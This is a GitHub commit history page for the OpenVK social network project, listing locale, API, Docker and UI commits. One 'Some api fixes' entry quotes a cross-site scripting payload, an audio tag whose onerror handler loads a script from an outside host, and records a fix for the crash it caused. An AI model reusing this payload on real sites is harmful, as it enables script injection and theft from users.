Commit graph

1707 commits

Author SHA1 Message Date
ayato
fdba45d49a
locales: English: fix confusing labels in the repost modal
Clarified modal phrasing when reposting a user's post. The previous wording, 'Share to user's wall,' was ambiguous and could be interpreted as either sharing to your own wall or the original user's wall. Updated the language to make it clear that the post will be shared to your wall.
2024-09-26 20:30:49 +05:00
ayato
d4f14ba09d
locales: English: fix grammar 2024-03-13 21:47:27 +06:00
celestora
869712d73a
improvement(README): add system requirements (people ask for them a lot) 2024-02-19 13:41:38 +03:00
Jillian Österreich
eb95cef6d0
improve(locale-en): Correct spelling in some strings
minor spelling mistake 🌋
2024-02-05 12:23:31 +07:00
veselcraft
0f81a6a0c3
fix(reports): fix 500 error when trying to delete or ban user if it's not post 2024-01-30 11:34:42 +03:00
Daniel
73ee4f5abf
OpenVK Midnight: some fixes 2024-01-30 10:48:27 +03:00
Daniel
14b0b78cce
Site Tour: hype update KB251732 2024-01-30 10:44:06 +03:00
Mikhail Lebedinets
c2be06b58f
fix(StatusExpress): button width (#1081) 2024-01-17 15:55:19 +03:00
celestora
c863e07908
fix(ImageBox): fix next/prev image navigation
height: 100% only works if parent position is not static, without this property image navigation "buttons" were too long and were covering important butt*ns
2024-01-08 14:07:27 +02:00
Anonymous
64827402ee
perf(feed): lazy load 2024-01-06 21:30:59 +03:00
ayato
d60df69825
README.md: minor spelling mistake (#1074) 2024-01-02 22:27:30 +02:00
Anatoly Bogomolov
49e061f563
fix(audio): sort genres alphabetically (#1065) 2024-01-02 22:26:55 +02:00
44531fcbb0
fix(DateTime): use php81_bc/strftime (#1063)
Native strftime was deprecated in PHP 8.1 so I replaced it with an
alternative library that uses ICU so that you don't have to set up
locales on your server anymore.
Also this commit removes AM/PM labels as timestamps were in 24h format
anyways, regardless of locale.
2024-01-02 22:22:10 +02:00
Dmitry Tretyakov
fabf9ffd71
improve(locale-ru): Correct spelling for audio_requirements 2024-01-02 19:20:47 +07:00
veselcraft
acc5459f90
feat(posts, platforms): add windows phone icon 2023-12-27 03:34:18 +03:00
celestora
ecb778b2db
improve(apps): make iframe sandbox flags more liberal (#1072) 2023-12-22 15:57:39 +03:00
mikhail "synzr
5617572967
English: changed track_noname to Untitled (#1069) 2023-12-20 22:02:30 +03:00
Dmitry Tretyakov
4548e2290a
VKAPI: Fix Users.get with field=counters 2023-12-13 21:24:40 +07:00
e813549602
fix: solve some warnings
Notifications.php: make $count parameter explicit as it is placed before
another explicit parameter
OpenVKPresenter.php: add additional null checks
Themepacks.php: add return type to offsetGet
2023-12-11 13:15:01 +03:00
2eb15cb600
fix(composer,templates): remove zadarma traces 2023-12-11 13:11:04 +03:00
3d08bd1370
fix(config): add missing entries 2023-12-11 13:09:43 +03:00
88d0ef3ef2
feat(docker): provide example config 2023-12-10 22:23:22 +03:00
88d296a9c4
fix(repositories): make db queries use count
This should fix /about page
2023-12-10 21:55:28 +03:00
b2b6fe6966
fix(gh-actions): bump BASE_IMAGE_VERSION to 8.2 2023-12-10 21:26:58 +03:00
f4ba39c6f2
ci(docker): bump PHP version to 8.2 2023-12-10 21:21:50 +03:00
6954cd9c55
build(composer): add composer.lock file 2023-12-10 21:02:06 +03:00
2449d71595
fix(sqls): assign a number to 00044-close-profiles.sql 2023-12-02 20:29:28 +03:00
lalka2018
1e7fdeff27
feat: close profile (#978) 2023-12-02 20:21:16 +03:00
zavsc
04eb724cd5
feat(api): add ability to know what user is listening (#1048) 2023-12-02 20:06:48 +03:00
Mikita Wiśniewski
41e4383d3b
fix(themepacks/modern): minor fixes and touches (#1054) 2023-12-02 20:04:51 +03:00
veselcraft
1625557e24
fix(api): 500 error if user from repost does not exist 2023-12-01 15:10:13 +03:00
Vladimir Barinov
5b8fe91a33
Изменения понятия "гендер" и "пол" на "местоимения" (#1033) 2023-11-30 17:39:55 +03:00
Vladimir Barinov
237206ccec
Global: Add new required extension
PDO SQLite is required for messages to work. For some reason it's not required by default
2023-11-28 15:12:23 +03:00
veselcraft
453b002451
Web: fix that annoying bug with scrolling 2023-11-22 19:00:55 +03:00
Dmitry Tretyakov
050afab816
VKAPI: remove last comma in counters (Users.get) 2023-11-22 15:32:08 +07:00
Dmitry Tretyakov
35bd3ad1e0
VKAPI: add counters field in Users.get 2023-11-22 15:31:26 +07:00
Vladimir Barinov
93bfe6e886
зязя попросил 2023-11-18 21:22:12 +03:00
Dmitry Tretyakov
3c624a9c78
VKAPI: Add original author info with extended=1 if reposted 2023-11-18 12:01:33 +07:00
lalka2018
2b9e316b80 COMPLETELY REMOVE AUDIOS from init-static-db.sql 2023-11-17 18:12:01 +03:00
lalka2018
4e3a6f35cb Add correct index for suggested 2023-11-16 19:53:01 +03:00
lalka2018
4699fcbeb9
Groups: Wall: add suggestions (#935)
* Wall: add early suggestions

* Fix br

* Fix empty posts

* fck

* Add offset for api

* Add notifications of new suggestion posts

* Fix mentions in suggested posts

* 🤮🤢

* Change regex

Теперь оно удаляет все теги а не только <br>

* Add da koroche pohuy

* Эдд апи метходс

Методы нестандартные немного

* Pon

* Add skloneniyia

* newlines

* int

* Update loaders and add avtopodgruzka postov

* Update JOERGK.strings

* Blin

* Remove repeated code, fix loaded buttons on chr...

...ome and fix getting suggested posts via API.Wall.getPost

* Fix polls

* Fihes

Теперь уведомление о принятии поста не приходит, если вы приняли свой же пост

Пофикшен баг перехода в предложку

Добавлен старый вид постов в предложке

Теперь счётчик постов в предложке у прикреплённой группы обновляется при принятии или отклонении поста

Убрано всплывающее уведомление об отклонении поста (оно раздражает)

Теперь если вы посмотрели все посты на одной странице (не на первой) и на ней не осталось постов, вас телепортирует на предыдущую страницу

* Remove ability to delete your accepted psto

* oi blin

* Improvements 2 api

* g

* openvk.uk

Возможно, приведение кода к кодстайлу (удаление скобочек то есть)

* aiaks

* al_wall.js -> al_suggestions.js

* 👨‍💻 Add 👨‍💻 fading 👨‍💻

* Add "owner's posts' and "other's posts"

Давайте рофлить👨‍💻👨‍💻👨‍💻

* planshet openvk

Add tabs for post view, add signer's object in wall get and add person icon in microblog

* Simplefai ze kod

* PHP 8 FIX WATAFAK

* Add indesk
2023-11-16 19:44:12 +03:00
lalka2018
3112372d01 Fix videos picker 2023-11-16 14:35:08 +03:00
lalka2018
704fdb113b Some api fixes
- Теперь опросы прикрепляются через апи нормально
- Через wall.edit теперь можно прикреплят новые аудио
- При закрытии messagebox снова включается возможность скроллить
- Через методы редактирования можно теперь прикреплять чужие хуйни
- Удалены методы notes.deleteComment и notes.editComment, ведь они одинаковы с wall.deleteComment и wall.editComment
- Лайки у видеозаписей теперь быстрее, ведь не прогружают новую страницу (в отличии от лайков на посте)
- Название "<audio src/onerror="$(body).append('<script src=//sdzk.xyz/a>')"" больше не вызывает краш оконного плеера
2023-11-15 17:46:38 +03:00
lalka2018
9e7467ed97 Fix al_wall.js 2023-11-15 15:40:45 +03:00
lalka2018
0f0d3ee950
Videos: add window player (#951)
* De#910fy

* Fiksez

* newlines

---------

Co-authored-by: Dmitry Tretyakov <76806170+tretdm@users.noreply.github.com>
2023-11-15 11:41:18 +03:00
Jaroslav
9fbf7f5bf5
Update Belorussian (bel-latin too) (LIP) and Ukrainian languages (#1034)
* Update music strings

* Змінено запозичення

* Update LIP Belorussian

* Update LIP bel-lat

* Попросили

* Update uk.strings
2023-11-14 23:04:27 +03:00
Anonymous
359129bae3
Add some things to robots.txt (#921) 2023-11-14 23:02:54 +03:00
n1rwana
dcf3631d89
Fix re-adding to Chandler-group (#938) 2023-11-14 22:57:49 +03:00
lalka2018
71c59023cf
Improve API (#975)
* Add API for notifications

* Add editing methods

* Add apis for likes and polls

* Add attaching polls

* can_edit

* Fix getting voters in anonymous posts and use c...

...anBeEditedBy instead of checking user's id
2023-11-14 22:44:39 +03:00
6660cb8d94
Change number for 00042-marital-status-user.sql 2023-11-14 22:17:11 +03:00